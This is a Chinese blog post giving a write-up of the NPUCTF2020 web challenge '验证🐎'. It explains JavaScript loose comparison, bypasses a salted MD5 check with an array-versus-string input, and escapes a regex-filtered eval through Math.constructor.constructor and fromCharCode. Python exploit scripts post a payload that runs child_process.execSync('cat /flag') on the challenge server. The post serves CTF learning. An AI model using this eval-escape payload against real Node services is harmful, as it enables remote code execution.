<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 3.9.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"www.plasf.cn","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="我们用一段代码来看再JavaScript中的类型比较：    可以看到数组[1]==1在两个等于号时候是返回true的，而在三个等于号时候会返回false。这一点是和php一样的。  而在JavaScript中各个数据类型的相加呢？    可以看到对象和字符串相加最后得到的是字符串。而数组和字符串相加最后也是得到字符串。所以可以基本得出结论就是，node中任何数据类型和字符串相加最后得到的都是字">
<meta name="keywords" content="WriteUp">
<meta property="og:type" content="article">
<meta property="og:title" content="NPUCTF2020 验证🐎-（弱类型比较、hash绕过、构造函数执行任意代码）">
<meta property="og:url" content="https://www.plasf.cn/articles/d5efc80b37.html">
<meta property="og:site_name" content="Xiao Leung&#39;s Blog">
<meta property="og:description" content="我们用一段代码来看再JavaScript中的类型比较：    可以看到数组[1]==1在两个等于号时候是返回true的，而在三个等于号时候会返回false。这一点是和php一样的。  而在JavaScript中各个数据类型的相加呢？    可以看到对象和字符串相加最后得到的是字符串。而数组和字符串相加最后也是得到字符串。所以可以基本得出结论就是，node中任何数据类型和字符串相加最后得到的都是字">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://goodcheerleung.gitee.io/blog/20200424150332.png">
<meta property="og:image" content="http://goodcheerleung.gitee.io/blog/20200424162607.png">
<meta property="og:image" content="http://goodcheerleung.gitee.io/blog/20200424180609.png">
<meta property="og:image" content="http://goodcheerleung.gitee.io/blog/20200424215524.png">
<meta property="og:image" content="http://goodcheerleung.gitee.io/blog/20200424231655.png">
<meta property="og:image" content="http://goodcheerleung.gitee.io/blog/20200424231946.png">
<meta property="og:image" content="http://goodcheerleung.gitee.io/blog/20200424235002.png">
<meta property="og:image" content="http://goodcheerleung.gitee.io/blog/20200425002236.png">
<meta property="og:image" content="http://goodcheerleung.gitee.io/blog/20200425003241.png">
<meta property="og:image" content="http://goodcheerleung.gitee.io/blog/20200425003702.png">
<meta property="og:image" content="http://goodcheerleung.gitee.io/blog/20200425004237.png">
<meta property="og:updated_time" content="2020-10-14T09:28:23.427Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="NPUCTF2020 验证🐎-（弱类型比较、hash绕过、构造函数执行任意代码）">
<meta name="twitter:description" content="我们用一段代码来看再JavaScript中的类型比较：    可以看到数组[1]==1在两个等于号时候是返回true的，而在三个等于号时候会返回false。这一点是和php一样的。  而在JavaScript中各个数据类型的相加呢？    可以看到对象和字符串相加最后得到的是字符串。而数组和字符串相加最后也是得到字符串。所以可以基本得出结论就是，node中任何数据类型和字符串相加最后得到的都是字">
<meta name="twitter:image" content="http://goodcheerleung.gitee.io/blog/20200424150332.png">

<link rel="canonical" href="https://www.plasf.cn/articles/d5efc80b37.html">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>NPUCTF2020 验证🐎-（弱类型比较、hash绕过、构造函数执行任意代码） | Xiao Leung's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Xiao Leung's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">专注网络安全研究</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-sitemap">

    <a href="/sitemap.xml" rel="section"><i class="fa fa-sitemap fa-fw"></i>站点地图</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://www.plasf.cn/articles/d5efc80b37.html">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/header.jpg">
      <meta itemprop="name" content="XiaoLeung">
      <meta itemprop="description" content="随笔、分享、记录生活">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Xiao Leung's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          NPUCTF2020 验证🐎-（弱类型比较、hash绕过、构造函数执行任意代码）
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2020-04-25 00:47:35" itemprop="dateCreated datePublished" datetime="2020-04-25T00:47:35+08:00">2020-04-25</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2020-10-14 17:28:23" itemprop="dateModified" datetime="2020-10-14T17:28:23+08:00">2020-10-14</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF比赛/" itemprop="url" rel="index"><span itemprop="name">CTF比赛</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span><br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>4.1k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>4 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <ul>
<li>我们用一段代码来看再JavaScript中的类型比较：</li>
</ul>
<p><img src="http://goodcheerleung.gitee.io/blog/20200424150332.png" alt="20200424150332"></p>
<ul>
<li><p>可以看到数组<code>[1]==1</code>在两个等于号时候是返回true的，而在三个等于号时候会返回false。这一点是和php一样的。</p>
</li>
<li><p>而在JavaScript中各个数据类型的相加呢？</p>
</li>
</ul>
<p><img src="http://goodcheerleung.gitee.io/blog/20200424162607.png" alt="20200424162607"></p>
<p>可以看到对象和字符串相加最后得到的是字符串。而数组和字符串相加最后也是得到字符串。所以可以基本得出结论就是，<strong>node中任何数据类型和字符串相加最后得到的都是字符串</strong>。</p>
<p><img src="http://goodcheerleung.gitee.io/blog/20200424180609.png" alt="20200424180609"></p>
<p>而长度<code>length</code> 属性对于字符串是返回字符串长度，而数组是返回数组元素个数。而数字是没有<code>length</code> 的。</p>
<p><img src="http://goodcheerleung.gitee.io/blog/20200424215524.png" alt="20200424215524"></p>
<h2 id="NPUCTF2020-验证🐎"><a href="#NPUCTF2020-验证🐎" class="headerlink" title="[NPUCTF2020]验证🐎"></a>[NPUCTF2020]验证🐎</h2><pre><code class="javascript">app.post(&#39;/&#39;, function (req, res) {
  let result = &#39;&#39;;
  const results = req.session.results || [];
  const { e, first, second } = req.body;
  if (first &amp;&amp; second &amp;&amp; first.length === second.length &amp;&amp; first!==second &amp;&amp; md5(first+keys[0]) === md5(second+keys[0])) {
    if (req.body.e) {
      try {
        result = saferEval(req.body.e) || &#39;Wrong Wrong Wrong!!!&#39;;
      } catch (e) {
        console.log(e);
        result = &#39;Wrong Wrong Wrong!!!&#39;;
      }
      results.unshift(`${req.body.e}=${result}`);
    }
  } else {
    results.unshift(&#39;Not verified!&#39;);
  }
  if (results.length &gt; 13) {
    results.pop();
  }
  req.session.results = results;
  res.send(render(req.session.results));
});</code></pre>
<p>以这道题为例:</p>
<h3 id="hash绕过"><a href="#hash绕过" class="headerlink" title="hash绕过"></a>hash绕过</h3><p>要满足<code>first &amp;&amp; second &amp;&amp; first.length === second.length &amp;&amp; first!==second &amp;&amp; md5(first+keys[0]) === md5(second+keys[0])</code> 结合上面的结论我们我们想要<code>first</code> 和<code>second</code> 长度一样而他们内容又不相等，但是他们md5加盐后的值又要相等。可以构造如下payload：</p>
<pre><code>{&quot;e&quot;:paylod,&quot;first&quot;:[0],&quot;second&quot;:&quot;0&quot;}</code></pre><p>这是因为数组利用了<strong>任何数据类型加上字符串都会转变称为字符串的特性</strong>。同时数组和字符串的长度都是1但是他们却不全等。</p>
<pre><code class="python">import requests
import json
headers = {
    &quot;Content-Type&quot;:&quot;application/json&quot;
}
url = &quot;http://ff8efecb-b1bc-4df1-af3d-249b285a0c54.node3.buuoj.cn/&quot;
data = {&quot;e&quot;:&#39;paylod&#39;,&quot;first&quot;:[0],&quot;second&quot;:&quot;0&quot;}
r = requests.post(url,data=json.dumps(data),headers=headers)
print(r.text)</code></pre>
<p>这道题的第二关我一直没做出来,虽然看正则就知道是用math去RCE。</p>
<h3 id="构造函数执行任意代码"><a href="#构造函数执行任意代码" class="headerlink" title="构造函数执行任意代码"></a>构造函数执行任意代码</h3><p>题目关键代码：</p>
<pre><code class="javascript">function saferEval(str) {
  if (str.replace(/(?:Math(?:\.\w+)?)|[()+\-*/&amp;|^%&lt;&gt;=,?:]|(?:\d+\.?\d*(?:e\d+)?)| /g, &#39;&#39;)) {
    return null;
  }
  return eval(str);
}</code></pre>
<p>从正则可以看出只能嵌套Math而且Math只能用一个点，也就是只能用一层属性。</p>
<p>我们再来看最终的payload:</p>
<pre><code class="javascript">(Math=&gt;(
    Math=Math.constructor,
    Math.x=Math.constructor(
        Math.fromCharCode(
114,101,116,117,114,110,32,112,114,111,99,101,115,115,46,109,97,105,110,77,111,100,117,108,101,46,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,83,121,110,99,40,39,99,97,116,32,47,102,108,97,103,39,41)
        )()))(Math+1)</code></pre>
<p><code>Math=&gt;</code> 是什么意思？我们来看个简单的例子：</p>
<p><img src="http://goodcheerleung.gitee.io/blog/20200424231655.png" alt="20200424231655"></p>
<p>可以发现最终是生成了个函数。是的这就是我们熟悉的匿名函数。<code>x =&gt; x * x</code> 相当于：</p>
<pre><code class="javascript">function (x) {
    return x * x;
}</code></pre>
<p>同理<code>a = x=&gt;x*x</code> 相当于命名了一个名字为a的函数：</p>
<p><img src="http://goodcheerleung.gitee.io/blog/20200424231946.png" alt="20200424231946"></p>
<p>那么<code>(x=&gt;x+x)(2)</code>呢其实就相当于往这个函数里面传入参数2：</p>
<p><img src="http://goodcheerleung.gitee.io/blog/20200424235002.png" alt="20200424235002"></p>
<p>我们再回到payload本身<code>(Math=Math.constructor,Math.x=Math.constructor(......))</code> 可以清楚地看到最外层括号是一个逗号运算，而逗号运算我们知道是从左往右运算再最后返回最右边的值。我们由此得知这里是执行这么个运算：</p>
<pre><code class="javascript">Math.constructor.constructor(.....)</code></pre>
<p>而这又是什么呢，我们直接逐层测试的<code>Math.constructor</code> ：</p>
<p><img src="http://goodcheerleung.gitee.io/blog/20200425002236.png" alt="20200425002236"></p>
<p>可以见到第一层返回的<code>function object()</code>,他是function的对象原型，而我们知道Object的构造器是指向Function的所以第二层会出现Function。而Function是构造函数他能够创建函数。可以简单理解他和eval类似。我们可以测试一个例子：</p>
<pre><code class="javascript">var sum = Math.constructor.constructor(&#39;a&#39;, &#39;b&#39;, &#39;return a + b&#39;);
sum(1,2);
var fun = new Function(&#39;a&#39;, &#39;b&#39;, &#39;return a + b&#39;);
fun(1,2)</code></pre>
<p><img src="http://goodcheerleung.gitee.io/blog/20200425003241.png" alt="20200425003241"></p>
<p>可以直接看到结果，<code>Math.constructor.constructor()</code> 和构造函数<code>new Function()</code> 是等效的。当然这个不知在Math中其他任意函数应该也是类似的。例如：alert()</p>
<p><img src="http://goodcheerleung.gitee.io/blog/20200425003702.png" alt="20200425003702"></p>
<p>而payload的最里面<code>fromCharCode</code>就很容易理解了就是把AIISC码转换为字符串,那么生成payload脚本如下：</p>
<pre><code class="python">import re
encode = lambda code: list(map(ord,code))
decode = lambda code: &quot;&quot;.join(map(chr,code))
a=f&quot;&quot;&quot;
(m0=&gt;(
        m0=m0.constructor,
        m0.x=m0.constructor(
            m0.fromCharCode({encode(&quot;return process.mainModule.require(&#39;child_process&#39;).execSync(&#39;cat /flag&#39;)&quot;)})
        )()
    ))(Math+1)
&quot;&quot;&quot;
a=re.sub(r&quot;[\s\[\]]&quot;, &quot;&quot;, a).replace(&quot;m0&quot;,&quot;Math&quot;)
print(a)
</code></pre>
<h3 id="最终EXP"><a href="#最终EXP" class="headerlink" title="最终EXP"></a>最终EXP</h3><pre><code class="python">import requests
import json
headers = {
    &quot;Content-Type&quot;:&quot;application/json&quot;
}
url = &quot;http://14b5ae3b-e444-4e5b-9e2b-1ba3100fc085.node3.buuoj.cn/&quot;
data = {&quot;e&quot;:&#39;(Math=&gt;(Math=Math.constructor,Math.x=Math.constructor(Math.fromCharCode(114,101,116,117,114,110,32,112,114,111,99,101,115,115,46,109,97,105,110,77,111,100,117,108,101,46,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,83,121,110,99,40,39,99,97,116,32,47,102,108,97,103,39,41))()))(Math+1)&#39;,&quot;first&quot;:[0],&quot;second&quot;:&quot;0&quot;}
r = requests.post(url,data=json.dumps(data),headers=headers)
print(r.text)</code></pre>
<p>GETFLAG:</p>
<p><img src="http://goodcheerleung.gitee.io/blog/20200425004237.png" alt="20200425004237"></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/WriteUp/" rel="tag"># WriteUp</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/articles/d44a4997a7.html" rel="prev" title="记一次MISC二维码的修复">
      <i class="fa fa-chevron-left"></i> 记一次MISC二维码的修复
    </a></div>
      <div class="post-nav-item">
    <a href="/articles/d61b44424b.html" rel="next" title="2020安恒4月月赛web1">
      2020安恒4月月赛web1 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#NPUCTF2020-验证🐎"><span class="nav-number">1.</span> <span class="nav-text">[NPUCTF2020]验证🐎</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#hash绕过"><span class="nav-number">1.1.</span> <span class="nav-text">hash绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#构造函数执行任意代码"><span class="nav-number">1.2.</span> <span class="nav-text">构造函数执行任意代码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#最终EXP"><span class="nav-number">1.3.</span> <span class="nav-text">最终EXP</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="XiaoLeung"
      src="/header.jpg">
  <p class="site-author-name" itemprop="name">XiaoLeung</p>
  <div class="site-description" itemprop="description">随笔、分享、记录生活</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">63</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">13</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">14</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      Links
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://www.redmango.top/" title="https://www.redmango.top/" rel="noopener" target="_blank">HhhM</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://l1near.top/" title="https://l1near.top/" rel="noopener" target="_blank">L1nearのspace</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.mrskye.cn/" title="https://www.mrskye.cn/" rel="noopener" target="_blank">SkYe's Blog</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.kawhi.xyz" title="https://www.kawhi.xyz" rel="noopener" target="_blank">kawhi</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        
  <div class="beian"><a href="https://beian.miit.gov.cn" rel="noopener" target="_blank">粤ICP备18132442号-1 </a>
      <img src="/gongan.png" style="display: inline-block;"><a href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=44011202000643" rel="noopener" target="_blank">粤公网安备 44011202000643号 </a>
  </div>

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">XiaoLeung</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="站点总字数">229k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">3:28</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script>
<script src="/js/schemes/pisces.js"></script>
<script src="/js/next-boot.js"></script>



  




  <script src="/js/local-search.js"></script>












  

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
